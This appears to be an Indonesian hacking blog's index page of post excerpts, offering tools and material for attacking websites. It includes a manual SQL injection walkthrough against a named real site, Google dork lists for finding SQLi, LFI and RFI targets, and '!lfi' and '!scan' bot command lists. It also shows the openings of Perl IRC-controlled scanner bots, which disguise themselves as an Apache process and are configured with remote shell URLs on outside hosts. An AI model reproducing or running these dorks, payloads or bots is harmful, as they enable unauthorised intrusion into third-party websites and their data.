Manual SQL Injection Tutorial

Manual SQL Injection Tutorial By : arianom Kill-9 Crew Target : http://www.natoleo.com/Content.php?id=14 1. Cek bug pada suatu website dengan menambahkan single quote ( ' ) dibelakang url, ternyata terdapat bug pada http://www.natoleo.com http://www.natoleo.com/Content.php?id=14’ muncul pesan error: MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' order by a.content_order Asc' at line 1) 2. Untuk mencari...

Special BUg SQL Injection

inurl:"id=" & intext:"Warning: mysql_fetch_assoc()inurl:"id=" & intext:"Warning: mysql_fetch_array()inurl:"id=" & intext:"Warning: mysql_num_rows()inurl:"id=" & intext:"Warning: session_start()inurl:"id=" & intext:"Warning: getimagesize()inurl:"id=" & intext:"Warning: is_writable()inurl:"id=" & intext:"Warning: getimagesize()inurl:"id=" & intext:"Warning: Unknown()inurl:"id=" & intext:"Warning: session_start()inurl:"id=" & intext:"Warning: mysql_result()inurl:"id=" & intext:"Warning:...

Dork XML

!xml active/components/xmlrpc/client.php?c[components]= /Pindorama/!xml /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= "com_sitemap"!xml /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path= "com_videodb"!xml /ch_readalso.php?read_xml_include= "Copyrights ? 2005 Belgische Federale Overheidsdiensten"!xml /include/monitoring/engine/MakeXML.php?fileOreonConf= "oreon.conf.php"!xml /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf= "common-Func-ACL.php"!xml /sitemap.xml.php?dir[classes]=...

LFI Dork

!lfi submitComment.php?DOCUMENT_ROOT= submitComment.php!lfi index.php?option=com_beeheard&controller= index.php?option=com_beeheard!lfi index.php?option=com_arcadegames&controller= option=com_arcadegames!lfi index.php?option=com_flashgames&controller= "option=com_flashgames"!lfi /index.php?option=com_addressbook&controller= "option=com_addressbook"!lfi index.php?option=com_advertising&controller= index.php?option=com_advertising!lfi /index.php?option=com_cvmaker&controller= /index.php?option=com_cvmaker!lfi...

Joomla LFI dork

!lfi /index.php?option=com_myblog&Itemid=12&task= "com_myblog"!lfi /index.php?option=com_juliaportfolio&controller= "com_juliaportfolio"!lfi /index.php?option=com_sbsfile&controller= "com_sbsfile"!lfi /index.php?option=com_rokdownloads&controller= "com_rokdownloads"!lfi /index.php?option=com_sectionex&controller= "com_sectionex"!lfi /index.php?option=com_ganalytics&controller= "com_ganalytics"!lfi /index.php?option=com_janews&controller= "com_janews"!lfi /index.php?option=com_linkr&controller=...

LFi Scanner v1.0

#!/usr/bin/perl######################################## Apache Conf Scanner v1.0 ## ReCoded by arianom ## d00r[at]telkom[dot]net ## Copyleft © 2009 VopCrew UnderGrounD ########################################use HTTP::Request;use LWP::UserAgent;use IO::Socket;use IO::Select;use Socket;my $fakeproc = $ARGV[6];$ircserver = $ARGV[0] unless $ircserver;my $ircport = $ARGV[1];my $nickname = $ARGV[2];my $ident = $ARGV[3];my $channel = '#'.$ARGV[4];my $runner = $ARGV[5];my...

e107 New Scanner ByroeNet

#!/usr/bin/perl$powered="ByroeNet";$mail="admin(at)byroe.net";#######################################################use HTTP::Request;use LWP::UserAgent;use IO::Socket;use IO::Select;use IO::Socket::INET;use Socket;use HTTP::Request::Common;use LWP::Simple;use LWP 5.64;use HTTP::Request::Common qw(POST);use Digest::MD5 qw(md5_hex);use MIME::Base64;my $fakeproc = "/usr/sbin/apache2 -k start";$ircserver = "irc.kill-9.server.or.id";my $ircport = "6667";my $nickname = "loveYou";my $ident = "love";my...

BaMbY LFI Scanner

#!/usr/bin/perl$powered="BaMbY";$mail="admin(at)bamby.web.id"; ################################################################################# ## 28/05/2010 ## Author : BaMbY ## Team : Irc.Konthol.Net ## WebSite : http://www.bamby.web.id ## Contact : admin(at)bamby.web.id ...

Havij v1.1: Advanced SQL Injection

Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page. It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and password hashes, dump tables and columns, fetching data from the database, running SQL statements and even accessing...

bug SQLi

Nih buat nyari target yang di web nya ada bug SQLiinurl:index.php?id= inurl:trainers.php?id= inurl:buy.php?category= inurl:article.php?ID= inurl:play_old.php?id= inurl:declaration_more.php?decl_id= inurl:pageid= inurl:games.php?id= inurl:page.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:show.php?id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num= inurl:Stray-Questions-View.php?num= inurl:forum_bds.php?num=...

RFI & LFI scanner

***************************AUTOR: arianomDATE :Juli 2009LINGUAGE: perl (.pl)**************************use IO::Socket::INET;use HTTP::Request;use LWP::UserAgent;require LWP;$|++;######################################################### CONFIGURATION //#######################################################$auth = "arianom";$authmail = "arianom\@live.it";my $id = "http://nuthome.net/xe/idosyris.txt??"; my $shell = "http://www.soraperra.com/canazeiinforma/ssh.txt??";my $ircd = "irc.gotakan.h4ck.la";...

Hack Mozilla firefox, meningkatkan kecepatan internet

Memang kalau cara hack tuh makin lama makin keren saja, banyak sekali yang bisa di hack mulai dari hack kartu kredit sampai ke hack sistem keamanan pentagonpun bisa di bobol hacker. Nah di sini saya tidak akan terlalu jauh bicara hack yang sulit sulit, di sini saya akan memberikan cara hack mozilla firefox untuk meningkatkan kecepatan internet anda biar jauh lebih cepat. Tips mempercepat kecepatan internet ini bukan hanya berlaku untuk komputer pribadi namun bisa juga untuk mempercepat kecepatan internet di warnet. Nah langsung...

Perintah Mematikan di Linux

Linux terkenal karena aspek keamanan penggunaan. Virus yang berteman baik dengan Windows misalnya, harus mencari cara yang sangat rumit untuk bisa menembus Linux. Meski demikian, dunia yang fana ini (hehehe…) merupakan tempat bagi beragam orang dengan berbagai sifat. Para penjahat dan psikopat bisa saja menyamar di berbagai forum dan mailing list, dan alih-alih memberikan solusi justru bisa membuat anda menderita....

Bug Dork Campur

!scan ///////?cmd&file= "List Users with Pics only?"!scan /assets/snippets/reflect/snippet.reflect.php?reflect_base= /MODx/!scan /include/scripts/export_batch.inc.php?DIR= ModernBill!scan /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path= technote7!scan /?sIncPath= "BoonEx- Community Software; Dating And Social Networking Scripts; Video Chat And More."!scan /parse/parser.php?WN_BASEDIR= WEB//NEWS Personal Newsmanagement - © 2002-2004 by Christian Scheb - Stylemotion.de!scan /parse/parser.php?WN_BASEDIR=...